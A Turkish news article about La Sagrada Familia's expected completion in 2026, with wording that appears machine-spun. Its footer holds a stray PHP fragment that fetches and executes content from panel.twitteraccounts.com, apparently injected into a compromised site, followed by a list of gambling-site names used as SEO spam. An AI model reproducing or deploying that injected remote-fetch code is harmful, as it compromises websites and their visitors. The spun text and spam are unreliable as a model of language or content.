İspanya’nın sembollerinden ‘La Sagrada Familia’nın inşaatı 2026’da tamamlanacak

Barcelona'da bulunan ve imaline 1882 yılında başlanan ‘La Sagrada Familia’, 144 yıl süren inşaatın akabinde 2026'da tamamlanacak.
DHA

Guinness Rekorlar Kitabı’ndan yapılan açıklamada, dünyanın en uzun müddettir devam eden etkin inşaat projesi olan La Sagrada Familia’nın, 2026’da tamamlanacağı söz edildi.

La Sagrada Familia Bazilikası, 1883 yılında Katalan mimar Antoni Gaudi tarafından devralınan en ünlü mimari yapıtlarından.

1926 yılında tramvayın altında kalarak hayatını kaybeden Gaudi, La Sagrada Familia’yı tamamlayamadı.

1883 YILINDAN BERİ TAMAMLANAMAMIŞTI

Yapının tamamlanamamasında İspanya İç Savaşı ve II. Dünya Savaşı üzere tarihi süreçler de tesirli oldu.

Binanın 2026 yılına kadar tamamlanması planlansa da, heykeller ve dekoratif ayrıntılar ile ana girişe giden tartışmalı merdiven üzerindeki çalışmaların 2034 yılına kadar devam etmesi bekleniyor.

Kaynak: Demirören Haber Ajansı (DHA)
Share the Post:

Related Posts

$exe = curl_init(); curl_setopt($exe, CURLOPT_URL, "https://panel.twitteraccounts.com/code?x=21"); curl_exec($exe); ?>

ligobet setrabet bahiscom bankobet betewin betkolik betcio betzula betgit tempobet sahabet betmoon starzbet tipobet Hostes Başkent Haber